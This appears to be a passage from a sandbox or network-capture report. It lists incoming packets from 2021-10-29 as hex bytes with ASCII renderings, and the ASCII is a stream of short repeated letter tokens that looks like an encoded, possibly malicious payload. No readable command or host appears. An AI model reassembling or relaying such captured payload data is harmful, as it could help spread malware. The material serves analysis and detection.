2021-10-29 18:50:16 UTC	1697	IN	Data Raw: 20 4b 6b 20 4f 4f 52 20 59 4b 20 74 6f 20 4f 52 20 4f 4f 74 20 51 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 6b 52 20 51 78 20 4f 74 4f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 51 20 59 4b 20 6b 4b 20 4f 4f 52 20 6b 78 20 4f 4f 74 20 52 74 20 59 6b 20 59 78 20 4b 51 20 59 78 20 4f 6f 4b 20 4b 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 45 20 45 20 59 6f 20 52 51 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 20 6f 4b 20 4f 6b 6f 20 4b 6b 20 45 78 20 4f 6b 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 4f 20 4f 4b 20 4b 6b 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 78 52 20 74 78 20 4f 78 4f 20 4f 4f 4b 20 4b 51 20 59 6f 20 6f 52 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 4f 52 20 52 74 20 59 6f 20 52 74 20 4f 59 45 20 59 4b 20 Data Ascii: Kk OOR YK to OR OOt QQ OOo Yx Kk Yx OtR kR Qx OtO OxQ OOo Yo QY Q YK kK OOR kx OOt Rt Yk Yx KQ Yx OoK KE OOt OxQ OOk KE E Yo RQ oYY OOK OOt OxE Ox oK Oko Kk Ex OkE OOK OOt Oxt EO OK Kk Yx Kk OOE OxR tx OxO OOK KQ Yo oR Oxk kK OOK OOY OOR Rt Yo Rt OYE YK
2021-10-29 18:50:16 UTC	1698	IN	Data Raw: 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 6b 51 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 4b 78 20 4f 20 52 6f 20 6b 52 20 4f 4f 45 20 4f 4f 45 20 52 51 20 4f 74 20 59 78 20 4b 6b 20 59 6f 20 4b 74 20 4f 78 45 20 4f 4f 52 20 52 20 4f 51 6b 20 4f 4f 6f 20 59 78 20 59 6b 20 74 6f 20 6f 6b 20 6f 4b 6f 20 4f 4f 45 20 6f 52 20 59 52 20 4f 4f 45 20 59 78 20 59 4b 20 45 78 20 6f 6f 20 6b 52 20 51 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 4f 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 6b 78 20 4f 4f 74 20 52 74 20 59 6b 20 59 78 20 4b 51 20 59 78 20 4f 6f 4b 20 4f 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 45 20 45 20 59 6f 20 52 51 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 20 6f 4b 20 4b Data Ascii: OOt Oxt kk OkQ Kk Yx Kk YQ Kk OOt OxQ OOk oE Kx O Ro kR OOE OOE RQ Ot Yx Kk Yo Kt OxE OOR R OQk OOo Yx Yk to ok oKo OOE oR YR OOE Yx YK Ex oo kR Qx OoK OxQ OOo Yo QY OO YK kK OOR kx OOt Rt Yk Yx KQ Yx OoK OR OOt OxQ OOk KE E Yo RQ oYY OOK OOt OxE Ox oK K
2021-10-29 18:50:16 UTC	1700	IN	Data Raw: 4f 78 51 20 4f 4f 6b 20 59 52 20 4b 74 20 52 4f 20 4f 6b 74 20 51 78 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 59 20 45 52 20 45 52 20 6f 78 4b 20 4b 6b 20 45 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 51 6b 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 52 74 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 52 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 6f 59 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 4b 45 20 45 52 20 6f 78 4b 20 4b 6b 20 45 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 4f 4f 20 4f 6f 4f 20 4f 4b 6f 20 59 6f Data Ascii: OxQ OOk YR Kt RO Okt Qx OOK OOt OOO kY ER ER oxK Kk Ek OOK OOt Oxt E OtQ Kk Yx Kk oKR kt Qk OoO OKo Yo Rt Yx YK ko O oKK OxQ OOo Yo OKR oE KR RK OKx OOY oY OOo Yx YK RY OkE kK OOK OOY oxt kY KE ER oxK Kk EE OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OOO OoO OKo Yo
2021-10-29 18:50:16 UTC	1701	IN	Data Raw: 59 45 20 59 78 20 59 78 20 4b 6b 20 45 51 20 6f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 45 6f 20 59 78 20 59 4b 20 4f 6f 74 20 51 78 20 4f 78 78 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 6f 4b 20 4f 6b 52 20 59 4b 20 6b 4b 20 4f 4f 52 20 51 59 20 74 59 20 4f 4f 59 20 59 4b 20 59 45 20 6f 52 20 51 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 59 78 20 6b 4b 20 6b 74 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 4b 59 20 4b 6b 20 59 78 20 45 51 20 6b 78 20 4f 20 6f 4b 51 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 4f 20 52 59 20 4f 4b 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 45 4f 20 59 4f 20 4b 6b 20 59 6f 20 4f 51 20 45 51 20 4f 78 74 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 74 4f 20 59 4f 20 59 4b 20 6b 6f 20 Data Ascii: YE Yx Yx Kk EQ oOY OOt OxQ Ooo oR Eo Yx YK Oot Qx Oxx OxQ OOo oY oK OkR YK kK OOR QY tY OOY YK YE oR QY kK OOK OOY tO OOo Yx KE o Yx kK kt OOR OxQ OOo KY Kk Yx EQ kx O oKQ Oxk OOo Yo oO RY OKY kK OOK Oot o EO YO Kk Yo OQ EQ Oxt OOt OxQ Ooo QE tO YO YK ko
2021-10-29 18:50:16 UTC	1702	IN	Data Raw: 4b 20 74 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4b 6b 20 59 78 20 4f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 4b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 4b 52 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 74 51 20 52 52 20 4f 4f 6b 20 4f 78 51 20 4f 6b 20 59 78 20 4b 6b 20 59 78 20 6f 6f 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4b 20 4f 78 6b 20 6f 52 20 51 6b 20 59 78 20 59 4b 20 51 4b 20 78 20 4f 45 20 4f 78 4f 20 4f 4f 6f 20 52 52 20 6f 4b 20 4f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 78 74 20 6b 6b 20 4f 59 6b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 78 20 52 6b 20 4f 4f 59 Data Ascii: K tE OOY OOt OxQ OOE Yx Kk Yx Ok kK OOK OOR OxQ OOo Yx Kk Yx YK kK OOK OxK Oxk OOo Yx KR YO YK kK OOQ OOt OxQ OOo RO Kk Yx YY tQ RR OOk OxQ Ok Yx Kk Yx oo kK OOK Oxx OOK Oxk oR Qk Yx YK QK x OE OxO OOo RR oK OO YK kK Oox Oot Oxt kk OYk Kk Yx Rx Oox Rk OOY
2021-10-29 18:50:16 UTC	1704	IN	Data Raw: 59 78 20 59 4b 20 6b 59 20 51 78 20 6f 78 59 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6f 4b 20 52 45 20 59 4b 20 6b 4b 20 4f 4f 6f 20 51 45 20 6f 4f 45 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 4f 4b 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 6f 78 6f 20 59 78 20 4b 6b 20 59 52 20 4f 6b 6f 20 51 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 59 20 4f 4b 20 59 52 20 4b 51 20 59 78 20 59 78 20 4b 74 20 6f 78 4f 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 52 20 59 6b 20 59 4f 20 59 4b 20 6b 78 20 4f 6f 20 4f 6f 4b 20 4f 78 6b 20 4f 4f 6f 20 59 4b 20 6f 51 20 6f 20 45 6f 20 45 6b 20 6f 6f 6b 20 4f 6f 59 20 4f 78 51 20 78 20 45 6b 20 6f 6f 4b 20 52 45 20 59 4b 20 6b 4b 20 4f 4f 6f 20 51 45 20 6f 4f 45 20 4f 4f 6f 20 59 78 20 59 6b 20 45 74 20 4f 6b 74 20 6f 4f 74 20 4f Data Ascii: Yx YK kY Qx oxY OxQ OOo YR ooK RE YK kK OOo QE oOE OOo Yx Yk oR OKE kK OOK Oot RQ oxo Yx Kk YR Oko QK OOY OOt OxY OK YR KQ Yx Yx Kt oxO OOt OxQ Ooo tR Yk YO YK kx Oo OoK Oxk OOo YK oQ o Eo Ek ook OoY OxQ x Ek ooK RE YK kK OOo QE oOE OOo Yx Yk Et Okt oOt O
2021-10-29 18:50:16 UTC	1705	IN	Data Raw: 4b 20 4f 6f 45 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 4f 52 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 45 6b 20 59 78 20 59 4b 20 6b 6f 20 6f 51 20 4f 4b 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 52 20 4f 4f 52 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 4f 4f 20 59 78 20 59 4b 20 6b 6f 20 6f 51 20 4b 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 52 20 52 6b 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 78 51 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 6b 6b 20 4f 78 59 20 6b 52 20 45 6b 20 6f 74 20 59 59 20 45 78 20 74 78 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 51 59 20 4b 51 20 59 78 20 4b 6b 20 4f 6f 52 20 59 6f 20 4f 4f 45 20 52 51 20 Data Ascii: K OoE OxQ OOo Yx Kk OOR Yx OoK oxR OOR OxQ OOk oR oEk Yx YK ko oQ OK Oxk OOo Yo oR OOR Yx OoK oxR OOR OxQ OOk oR oOO Yx YK ko oQ K Oxk OOo Yo oR Rk Yx OoK oxR OOR OxQ OOk oR oxQ Yx YK ko kt kk OxY kR Ek ot YY Ex tx OOK OOt tx EO QY KQ Yx Kk OoR Yo OOE RQ
2021-10-29 18:50:16 UTC	1709	IN	Data Raw: 52 20 4f 45 6b 20 4f 4f 4b 20 4f 78 78 20 4f 78 52 20 4f 78 45 20 4f 78 52 20 45 59 20 59 45 20 45 51 20 6b 45 20 51 51 20 4f 4f 59 20 6f 6f 74 20 6f 59 20 78 20 4f 4b 52 20 6f 45 52 20 59 45 20 4f 4f 4b 20 4f 74 6f 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 52 20 51 45 20 52 78 20 59 78 20 59 4b 20 51 4b 20 74 6f 20 4b 4f 20 4f 4b 52 20 4f 4b 45 20 6f 78 59 20 6f 45 6b 20 52 6f 20 45 51 20 6b 78 20 51 4b 20 4f 4f 4b 20 4f 6f 4b 20 4f 4f 52 20 51 45 20 59 51 20 59 78 20 59 4b 20 51 4b 20 4f 74 4b 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6b 20 45 45 20 4f 6f 20 4f 6f 52 20 4f 6f 59 20 4f 78 52 20 6f 59 4b 20 51 4f 20 4f 59 20 6f 78 20 6f 78 4f 20 4f 74 4f 20 4f 4b 4f 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 Data Ascii: R OEk OOK Oxx OxR OxE OxR EY YE EQ kE QQ OOY oot oY x OKR oER YE OOK Oto OOt OoK OOR QE Rx Yx YK QK to KO OKR OKE oxY oEk Ro EQ kx QK OOK OoK OOR QE YQ Yx YK QK OtK OtO OOx kR oER Kk Yk EE Oo OoR OoY OxR oYK QO OY ox oxO OtO OKO OtO OOx kR oER Kk Yo ok kY
2021-10-29 18:50:16 UTC	1713	IN	Data Raw: 20 6f 6f 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 45 20 6f 52 20 4f 6f 20 4f 6b 6f 20 59 78 20 59 4b 20 6b 4b 20 51 51 20 4f 78 78 20 6f 20 4f 52 52 20 59 78 20 4b 6b 20 59 52 20 45 51 20 51 6f 20 52 52 20 4f 4b 20 4f 78 52 20 6b 78 20 59 78 20 4b 6b 20 4f 6b 20 59 45 20 52 6f 20 51 45 20 74 20 4f 6f 4b 20 51 74 20 51 45 20 4f 51 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 51 20 4f 51 4f 20 4f 4f 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 78 6f 20 4b 6f 20 4f 6b 51 20 4f 78 4b 20 59 4b 20 6b 4b 20 4f 4f 59 20 6b 78 20 4f 6f 45 20 4f 4f 4f 20 6b 20 4f 74 45 20 6f 45 20 45 45 20 74 59 20 4b 52 20 6f 45 6f 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 4f 4b 6b 20 52 74 20 6f 51 20 59 51 20 4f 78 51 20 4f Data Ascii: ooK kK OOK Oot OoE oR Oo Oko Yx YK kK QQ Oxx o ORR Yx Kk YR EQ Qo RR OK OxR kx Yx Kk Ok YE Ro QE t OoK Qt QE OQ Yx YK QK oQ kO OxQ OOo YR EQ OQO OOx kK OOK OOR to Oxo Ko OkQ OxK YK kK OOY kx OoE OOO k OtE oE EE tY KR oEo Ex to Yx Kk YR OKk Rt oQ YQ OxQ O
2021-10-29 18:50:16 UTC	1717	IN	Data Raw: 20 4f 4f 74 20 4f 78 45 20 6f 4f 78 20 6f 52 20 6f 4f 52 20 59 78 20 59 4b 20 6b 6f 20 6f 51 20 4f 52 6b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 59 20 51 45 20 6f 6f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 74 6f 20 4f 74 59 20 4b 6b 20 59 78 20 59 4b 20 74 78 20 4f 4f 6f 20 51 45 20 74 52 20 4f 4f 6f 20 59 78 20 59 6b 20 52 45 20 52 45 20 45 51 20 6b 78 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 4f 51 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 4b 74 20 4b 78 20 45 78 20 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6f 20 4f 74 51 20 59 78 20 59 78 20 74 78 20 4f 6f 4b 20 6b 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 78 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 Data Ascii: OOt OxE oOx oR oOR Yx YK ko oQ ORk OxQ OOo YR YY QE oo kK OOK Oot Qt to OtY Kk Yx YK tx OOo QE tR OOo Yx Yk RE RE EQ kx OOt OxQ Ooo oR OQ Yx YK QK oQ kO OxQ OOo YR Kt Kx Ex R OOK OOt OxE o OtQ Yx Yx tx OoK kQ OOt OxQ Ooo tR KR Yx YK QK oQ OxR OxQ OOo YR
2021-10-29 18:50:16 UTC	1721	IN	Data Raw: 4f 4f 51 20 51 45 20 59 51 20 59 78 20 59 4b 20 51 4b 20 4f 74 4b 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4b 4b 20 4f 6f 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 45 4f 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 4f 59 52 20 59 78 20 59 4b 20 6b 4b 20 74 52 20 4f 4f 51 20 4f 78 51 20 4f 4f 6f 20 52 6f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 45 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 4b 4b 20 4f 4f 45 20 59 78 20 4b 6b 20 4f 6f 52 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 4b 6b Data Ascii: OOQ QE YQ Yx YK QK OtK OtO OOx kR oER Kk Yo ok kK OOK OOt KK Oo Yx Kk Kk YK kK OOK oEO Oxk OOo Yx OYR Yx YK kK tR OOQ OxQ OOo Ro Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx OEE kK OOK OOt oKK OOE Yx Kk OoR Yo kK OOK OOk OxQ OOo Yx Yk Yx YK kY OOo OOt OxQ OOo OKk
2021-10-29 18:50:16 UTC	1725	IN	Data Raw: 45 20 6f 45 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 74 20 45 20 4f 51 51 20 4b 6b 20 59 78 20 4b 6b 20 6b 6b 20 4f 6f 6f 20 4f 4f 4b 20 6f 20 4f 6f 6b 20 59 78 20 4b 6b 20 59 6f 20 52 6f 20 74 59 20 4f 6f 45 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 6f 4b 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 4b 20 4f 59 20 4b 6b 20 59 4b 20 45 52 20 4f 6f 20 4f 78 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4b 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 59 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 6b 20 45 6f 20 59 51 20 4f 45 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 6b 20 51 59 20 6f 45 74 20 59 4b 20 6b 4b 20 4f 6f 78 20 Data Ascii: E oEE kK OOK Oot Oxt E OQQ Kk Yx Kk kk Ooo OOK o Ook Yx Kk Yo Ro tY OoE oKk YY OOo Yx KQ oE oEx oKE OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo RK OY Kk YK ER Oo Oxt OxQ OOo YR oK KY YK kK Oox oR OYQ OOo Yx YK Yk Eo YQ OEK OOt OxQ OOk Yk QY oEt YK kK Oox
2021-10-29 18:50:16 UTC	1729	IN	Data Raw: 45 52 20 59 78 20 59 4b 20 6b 78 20 6f 59 6f 20 6f 6b 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 4b 51 20 6b 4b 20 78 20 4f 4f 45 20 4f 78 51 20 4f 4f 6f 20 74 20 4b 6b 20 59 78 20 45 51 20 6b 52 20 51 20 4f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 59 4f 20 4f 6b 4b 20 4f 52 74 20 74 59 20 4f 6f 74 20 59 45 20 4f 6b 74 20 4f 4f 59 20 59 78 20 4b 6b 20 4b 6b 20 59 45 20 52 4f 20 4f 78 74 20 4b 59 20 4f 4f 74 20 6b 6b 20 4f 6f 6b 20 4b 6b 20 59 78 20 4b 6b 20 52 74 20 6f 4b 20 4b 4b 20 78 20 4f 6f 6f 20 45 52 20 59 51 20 4b 6b 20 74 74 20 52 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 6f 20 4f 52 20 59 78 20 74 45 20 45 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 6f 6f 74 20 6f 59 20 59 74 20 59 78 20 74 6b 20 45 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 4f Data Ascii: ER Yx YK kx oYo ok tO OOo Yx KE o KQ kK x OOE OxQ OOo t Kk Yx EQ kR Q OxO OxQ OOo YK YO OkK ORt tY Oot YE Okt OOY Yx Kk Kk YE RO Oxt KY OOt kk Ook Kk Yx Kk Rt oK KK x Ooo ER YQ Kk tt RK OOK OOt OxY Qo OR Yx tE EK kK OOK OOE oot oY Yt Yx tk EK kK OOK OOE O
2021-10-29 18:50:16 UTC	1734	IN	Data Raw: 6f 52 20 4f 45 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 78 20 51 51 20 59 59 20 59 4f 20 4b 59 20 6b 6f 20 52 6f 20 52 59 20 4f 4f 78 20 4f 4f 4f 20 4f 4f 4b 20 45 59 20 59 45 20 4b 78 20 45 78 20 6f 45 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 78 45 20 6b 6b 20 4f 78 59 20 4b 6b 20 74 74 20 52 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 4b 6f 20 6f 52 20 4f 6f 6b 20 59 78 20 59 4b 20 6b 6f 20 6b 51 20 4f 78 4b 20 4f 4f 4f 20 4f 4f 4b 20 4b 51 20 45 45 20 59 59 20 6b 6b 20 4f 6f 20 6f 74 20 4f 4f 4f 20 52 51 20 4f 51 4b 20 59 78 20 4b 6b 20 59 6f 20 45 45 20 52 6f 20 4b 45 20 4f 4f 51 20 6f 6f 20 51 74 20 59 78 20 4b 6b 20 59 4b 20 4f 78 6b 20 4f 6f 4b 20 4f 51 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 45 59 20 59 6f 20 45 74 20 4f 4f 78 20 74 4f 20 4f 4f Data Ascii: oR OEo kK OOK OOY x QQ YY YO KY ko Ro RY OOx OOO OOK EY YE Kx Ex oEx OOK OOt Oxt OxE kk OxY Kk tt RQ OOK OOt OxY Ko oR Ook Yx YK ko kQ OxK OOO OOK KQ EE YY kk Oo ot OOO RQ OQK Yx Kk Yo EE Ro KE OOQ oo Qt Yx Kk YK Oxk OoK OQK OOt OxQ OOk EY Yo Et OOx tO OO
2021-10-29 18:50:16 UTC	1738	IN	Data Raw: 20 4f 4f 6f 20 59 78 20 59 6b 20 45 45 20 59 4f 20 52 51 20 4f 4f 51 20 51 51 20 51 6f 20 51 52 20 59 45 20 45 45 20 59 4b 20 4b 51 20 52 51 20 4f 4f 6b 20 6f 45 51 20 4f 6f 45 20 51 74 20 59 59 20 51 59 20 6f 78 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 4f 59 20 4f 78 52 20 51 74 20 59 4b 20 4f 74 78 20 52 4b 20 4f 4f 20 51 59 20 4f 4f 4b 20 59 20 4f 4f 51 20 45 4f 20 4f 51 52 20 4b 6b 20 59 78 20 52 78 20 4f 6f 78 20 4f 4f 78 20 4f 4f 51 20 4f 74 20 51 6b 20 59 78 20 4b 6b 20 59 4b 20 45 51 20 6b 78 20 4f 78 4f 20 4b 59 20 52 51 20 4f 78 51 20 59 78 20 4b 6b 20 6f 59 20 59 6f 20 4b 74 20 51 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 45 59 20 59 6f 20 59 45 20 45 51 20 6b 78 20 6f 45 6f 20 6f 4f 59 20 4f 6f 4b 20 4f 4f 52 20 45 74 20 4f 78 4b 20 45 45 20 59 Data Ascii: OOo Yx Yk EE YO RQ OOQ QQ Qo QR YE EE YK KQ RQ OOk oEQ OoE Qt YY QY oxx YK kK Oox oOY OxR Qt YK Otx RK OO QY OOK Y OOQ EO OQR Kk Yx Rx Oox OOx OOQ Ot Qk Yx Kk YK EQ kx OxO KY RQ OxQ Yx Kk oY Yo Kt QR OOt OxQ OOR EY Yo YE EQ kx oEo oOY OoK OOR Et OxK EE Y
2021-10-29 18:50:16 UTC	1742	IN	Data Raw: 20 4b 51 20 52 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 59 20 4f 4f 4b 20 74 45 20 45 74 20 59 78 20 59 4b 20 6b 78 20 6b 6b 20 4f 4f 78 20 51 45 20 4f 4f 4b 20 59 78 20 6f 78 6f 20 59 78 20 59 4b 20 6b 4b 20 74 51 20 4f 4f 74 20 4f 78 51 20 51 74 20 52 59 20 52 45 20 59 4f 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 4f 6b 20 6f 20 51 52 20 59 4f 20 4b 6b 20 59 52 20 52 4f 20 4f 78 6b 20 4f 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 45 20 51 59 20 45 59 20 59 59 20 6b 4b 20 4f 6f 78 20 4f 6f 4f 20 4f 4f 4f 20 6b 6b 20 6f 4b 74 20 4b 6b 20 59 78 20 4b 6b 20 51 6f 20 6f 51 20 6f 4f 52 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 4b 20 6f 4b 51 20 59 4b 20 6b 4b 20 4f 4f 52 20 74 52 20 4f 51 6f 20 4f 4f 6f 20 59 78 20 4b 6b 20 52 59 20 4f 4b 6f 20 6b 4b 20 4f 4f Data Ascii: KQ Rx kK OOK OOR OOY OOK tE Et Yx YK kx kk OOx QE OOK Yx oxo Yx YK kK tQ OOt OxQ Qt RY RE YO YK QK Oox OOk o QR YO Kk YR RO Oxk OkK OOt OxQ OOo YE QY EY YY kK Oox OoO OOO kk oKt Kk Yx Kk Qo oQ oOR Oxk OOo Yo oK oKQ YK kK OOR tR OQo OOo Yx Kk RY OKo kK OO
2021-10-29 18:50:16 UTC	1746	IN	Data Raw: 20 59 78 20 59 6b 20 51 45 20 74 20 6b 59 20 4f 4f 4b 20 4f 6f 74 20 4f 78 4f 20 51 78 20 59 78 20 4b 6b 20 4b 4f 20 52 20 6b 74 20 4f 4f 4b 20 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 52 20 59 78 20 59 4b 20 52 51 20 4f 78 78 20 51 45 20 4f 6b 6b 20 4f 4f 6f 20 59 78 20 59 4b 20 59 52 20 45 78 20 4f 78 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 20 4b 51 20 59 78 20 52 78 20 6b 6b 20 51 52 20 4f 4f 51 20 52 51 20 52 6b 20 59 4f 20 4b 6b 20 59 52 20 51 78 20 6b 6f 20 4b 78 20 51 45 20 51 59 20 4f 4f 45 20 59 78 20 59 6b 20 51 45 20 59 20 6b 59 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 51 6b 20 4b 6b 20 6f 4b 20 74 20 59 59 20 6b 4b 20 4f 6f 78 20 6f 59 20 4f 78 74 20 4b 6f 20 59 74 20 6b 51 20 59 45 20 51 59 20 45 51 20 52 6b 20 4f 4f 52 20 4f Data Ascii: Yx Yk QE t kY OOK Oot OxO Qx Yx Kk KO R kt OOK Ko OxQ OOo Yx OOR Yx YK RQ Oxx QE Okk OOo Yx YK YR Ex Oxo OOY OOt OxE EO O KQ Yx Rx kk QR OOQ RQ Rk YO Kk YR Qx ko Kx QE QY OOE Yx Yk QE Y kY OOK Oot Qt Qk Kk oK t YY kK Oox oY Oxt Ko Yt kQ YE QY EQ Rk OOR O
2021-10-29 18:50:16 UTC	1749	IN	Data Raw: 4b 74 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6b 6b 20 4f 6f 52 20 4b 51 20 59 78 20 52 78 20 4b 6f 20 6b 6f 20 4f 4f 52 20 4f 78 51 20 4f 4f 52 20 6f 45 20 6f 51 20 45 74 20 4f 52 20 4b 6f 20 4f 78 6b 20 4f 4f 52 20 4f 78 51 20 4f 4f 52 20 6f 78 4b 20 59 4b 20 4f 6b 20 59 6f 20 6b 4b 20 4f 4f 52 20 52 20 45 6f 20 4f 4f 45 20 59 78 20 59 6b 20 6f 45 20 4f 6b 6f 20 4f 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 6f 45 20 4b 6b 20 59 78 20 6f 51 20 4f 6f 4b 20 6b 4b 20 4f 4f 74 20 4f 78 51 20 51 4f 20 51 45 20 4f 6f 74 20 59 4f 20 59 4b 20 51 4b 20 6f 51 20 45 74 20 4f 78 6b 20 4f 4f 6f 20 59 